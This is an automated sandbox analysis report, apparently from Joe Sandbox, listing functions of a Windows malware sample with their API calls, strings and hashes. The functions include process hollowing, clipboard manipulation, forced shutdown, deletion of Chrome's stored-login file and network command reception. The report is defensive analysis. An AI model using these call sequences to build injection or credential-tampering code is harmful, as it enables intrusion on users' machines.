                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??1?$basic_string@?c_str@?$basic_string@D@std@@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                                • String ID: open
                                                • API String ID: 2455491495-2758837156
                                                • Opcode ID: 7efe36e6e1e5d25aae5f58f4cd2e1f90ebb62701f54890545eced29a792bebf3
                                                • Instruction ID: dc2c343ad6f5279aff848de4f64d0ef3dec3cf43580c3787717ab218fdc95aee
                                                • Opcode Fuzzy Hash: 7efe36e6e1e5d25aae5f58f4cd2e1f90ebb62701f54890545eced29a792bebf3
                                                • Instruction Fuzzy Hash: 004131B2901119AFDF14AFE1EC999EE777CAF14306F1044BAF502F21E1DE785A448B58
                                                Function 0040E14C Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114libraryloadershutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040E7DF: GetCurrentProcess.KERNEL32(00000028,?), ref: 0040E7EC
                                                  • Part of subcall function 0040E7DF: OpenProcessToken.ADVAPI32(00000000), ref: 0040E7F3
                                                  • Part of subcall function 0040E7DF: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040E805
                                                  • Part of subcall function 0040E7DF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040E824
                                                  • Part of subcall function 0040E7DF: GetLastError.KERNEL32 ref: 0040E82A
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00413984), ref: 0040E168
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040E17D
                                                • atoi.MSVCRT(00000000), ref: 0040E184
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,004135D8), ref: 0040E19C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040E1B1
                                                • atoi.MSVCRT(00000000), ref: 0040E1B8
                                                • ExitWindowsEx.USER32(00000000), ref: 0040E1F8
                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState), ref: 0040E20D
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040E214
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00413988), ref: 0040E22B
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041398C), ref: 0040E24C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$??8std@@D@2@@0@D@2@@std@@V?$basic_string@$??1?$basic_string@?c_str@?$basic_string@ProcessTokenatoi$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                • String ID: PowrProf.dll$SetSuspendState
                                                • API String ID: 2658298412-1420736420
                                                • Opcode ID: a315f00547a5687b912f868bcb9920717628d9b85d4a436909961b6bf655cfbd
                                                • Instruction ID: c35befcc3d375dde5ac55abfec913dbb4e682b3ad7d79a195e89e39a48f93aa9
                                                • Opcode Fuzzy Hash: a315f00547a5687b912f868bcb9920717628d9b85d4a436909961b6bf655cfbd
                                                • Instruction Fuzzy Hash: B9316275951216BACF04ABF1EC5ADFE772CAB5075B710487FF502B20D0DE784A408B58
                                                Function 0041178F Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 111fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                                • String ID: {@
                                                • API String ID: 520940213-2098953823
                                                • Opcode ID: 439dbb07643e836846f813bc94a5ba2f7d03a506b6d41fcbd66736f00f55164a
                                                • Instruction ID: 2d71d0b5fceb30af44960321e26e88bff0000f29ffcf8113564fd79c0b3d0115
                                                • Opcode Fuzzy Hash: 439dbb07643e836846f813bc94a5ba2f7d03a506b6d41fcbd66736f00f55164a
                                                • Instruction Fuzzy Hash: D4413E7294421CAADF10EBA0DC88FDE7BBCAB04315F1485A7E605E2050DB759BC5CF58
                                                Function 0040E25E Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 82clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EmptyClipboard.USER32 ref: 0040E269
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040E27A
                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 0040E287
                                                • GlobalLock.KERNEL32(00000000), ref: 0040E291
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040E2A5
                                                • GlobalUnlock.KERNEL32(?), ref: 0040E2CE
                                                • SetClipboardData.USER32(00000001,?), ref: 0040E2D9
                                                • CloseClipboard.USER32 ref: 0040E2F2
                                                • OpenClipboard.USER32 ref: 0040E2F9
                                                • GetClipboardData.USER32(00000001), ref: 0040E309
                                                • GlobalLock.KERNEL32(00000000), ref: 0040E312
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040E31B
                                                • CloseClipboard.USER32 ref: 0040E321
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 0040E33A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClipboardV?$allocator@$D@2@@std@@D@std@@GlobalU?$char_traits@$??1?$basic_string@CloseDataLockUnlock$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@AllocD@1@@EmptyOpen
                                                • String ID: p6A
                                                • API String ID: 3947674868-595022129
                                                • Opcode ID: e7d81bfc7f67cb270c73a8b13ae07536e37c400bb97724a1a3df4d7222808653
                                                • Instruction ID: c48fe3532f424c4c1f3264ad02959e16e860e3474de28d5f21c86c50b1dc4375
                                                • Opcode Fuzzy Hash: e7d81bfc7f67cb270c73a8b13ae07536e37c400bb97724a1a3df4d7222808653
                                                • Instruction Fuzzy Hash: B22144716001059BDB05AFB5ED5D5FE7BA9FB44302B00847AF503E22E1DF398A04CB68
                                                Function 0040EDE9 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157injectionthreadmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0040EDEE
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00419958,00000000,75922EE0), ref: 0040EE0A
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040EE11
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040EE64
                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040EE7C
                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0040EE91
                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040EEB3
                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040EEDE
                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040EF00
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040EF41
                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040EF62
                                                • SetThreadContext.KERNEL32(?,?), ref: 0040EF7B
                                                • ResumeThread.KERNEL32(?), ref: 0040EF88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                                • String ID: NtUnmapViewOfSection$ntdll.dll
                                                • API String ID: 65594003-1050664331
                                                • Opcode ID: bdd21d3a253677f4dddc1d0a5f597e8ba1dae0e69475547475e527f32612771e
                                                • Instruction ID: d50f2b51f192825980c78eefd926c059703a4cda61a9207a8cf544a2fd66dd4c
                                                • Opcode Fuzzy Hash: bdd21d3a253677f4dddc1d0a5f597e8ba1dae0e69475547475e527f32612771e
                                                • Instruction Fuzzy Hash: 79518871A00305BFDB209F69CC45FAABBB9EF44705F20442AFA44EB2A1D7759911CB18
                                                Function 00406447 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 68fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • getenv.MSVCRT ref: 0040645C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406467
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406472
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040647D
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406486
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040648D
                                                • GetLastError.KERNEL32 ref: 00406497
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],?,?,?,?,00000000), ref: 004064B8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004064CB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],?,?,?,?,00000000), ref: 004064F1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00406506
                                                Strings
                                                • [Chrome StoredLogins found, cleared!], xrefs: 004064EC
                                                • [Chrome StoredLogins not found], xrefs: 004064B3
                                                • UserProfile, xrefs: 00406457
                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00406451
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                • API String ID: 3740952235-1062637481
                                                • Opcode ID: 81aff7be51fa266aee90db2a0eec8a84f0a04648dbe5a01e4c4198d192b404fa
                                                • Instruction ID: ff5ace8db5db9424754ab0338091e6503ebdde2b7caff9f9140975201375651d
                                                • Opcode Fuzzy Hash: 81aff7be51fa266aee90db2a0eec8a84f0a04648dbe5a01e4c4198d192b404fa
                                                • Instruction Fuzzy Hash: B4115175640108ABDB04BFA4DD5EAEF7738EB05302F508066E402F21D0EE789B58C7AA
                                                Function 004020D0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 73networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00419D80,[INFO],00419288,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF), ref: 004020E2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 004020EF
                                                • malloc.MSVCRT ref: 004020FC
                                                • recv.WS2_32(00419D80,00000000,00000000,00000000), ref: 0040210D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402121
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040212B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402134
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402141
                                                  • Part of subcall function 0040219E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00419D80,00000000), ref: 004021B0
                                                  • Part of subcall function 0040219E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004021C8
                                                  • Part of subcall function 0040219E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004021D7
                                                  • Part of subcall function 0040219E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004021E1
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 004021FA
                                                  • Part of subcall function 0040219E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402203
                                                  • Part of subcall function 0040219E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00419DB4), ref: 00402222
                                                  • Part of subcall function 0040219E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402242
                                                  • Part of subcall function 0040219E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 0040225A
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040226C
                                                  • Part of subcall function 0040219E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6C995E04), ref: 00402282
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040228C
                                                  • Part of subcall function 0040219E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402295
                                                  • Part of subcall function 0040219E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004022A6
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004022B0
                                                  • Part of subcall function 0040219E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004022B9
                                                  • Part of subcall function 0040219E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004022CD
                                                • free.MSVCRT ref: 00402162
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402184
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040218D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                                • String ID: [INFO]
                                                • API String ID: 2200674315-4019176272
                                                • Opcode ID: 741893b63d31f3309f36e500531a00c1c7307a5c4bbb362c6c1d5134d433a73a
                                                • Instruction ID: 249c07bb62346c768de4153345167ba21387d24338bd6db9d5784eeadd8e2c5b
                                                • Opcode Fuzzy Hash: 741893b63d31f3309f36e500531a00c1c7307a5c4bbb362c6c1d5134d433a73a
                                                • Instruction Fuzzy Hash: B0212F32500109ABCB11EFA0DE99AEE7779FF44706F10407AF502A2190DB75AB09CB58
                                                Function 0040C800 Relevance: 18.1, APIs: 12, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0040C809
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 0040C81F
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(00414A50,00000000,00000002), ref: 0040C831
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040C83C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040C84B
                                                  • Part of subcall function 004035C3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004035D1
                                                  • Part of subcall function 004035C3: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004035DA
                                                  • Part of subcall function 004035C3: GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 004035F2
                                                  • Part of subcall function 004035C3: _itoa.MSVCRT ref: 004035F9
                                                  • Part of subcall function 004035C3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 0040360F
                                                  • Part of subcall function 004035C3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403617
                                                  • Part of subcall function 004035C3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00403626
                                                  • Part of subcall function 004035C3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00403633
                                                  • Part of subcall function 004035C3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040363F
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403648
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403651
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040365A
                                                  • Part of subcall function 004035C3: lstrlenA.KERNEL32(00000000), ref: 00403661
                                                  • Part of subcall function 004035C3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403677
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403680
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403689
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,00000000), ref: 0040C86D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 0040C877
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 0040C891
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040C89D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
